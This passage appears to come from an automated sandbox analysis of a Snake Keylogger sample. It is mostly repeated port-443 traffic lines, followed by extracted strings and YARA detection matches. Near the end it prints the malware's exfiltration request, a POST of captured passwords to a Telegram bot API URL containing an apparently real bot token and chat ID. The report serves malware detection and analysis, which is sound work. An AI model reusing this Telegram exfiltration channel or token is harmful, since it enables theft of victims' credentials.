                Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: 0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: 0OZQi3b0tM.exe, 0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 0OZQi3b0tM.exeString found in binary or memory: http://checkip.dyndns.org/q
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737020624.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 0OZQi3b0tM.exe, 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: 0OZQi3b0tM.exeString found in binary or memory: https://api.telegram.org/bot
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856
                Source: 0OZQi3b0tM.exe, 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: 0OZQi3b0tM.exe, 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                Source: unknownHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974Host: api.telegram.orgContent-Length: 504Connection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49948 version: TLS 1.2

                System Summary

                barindex
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
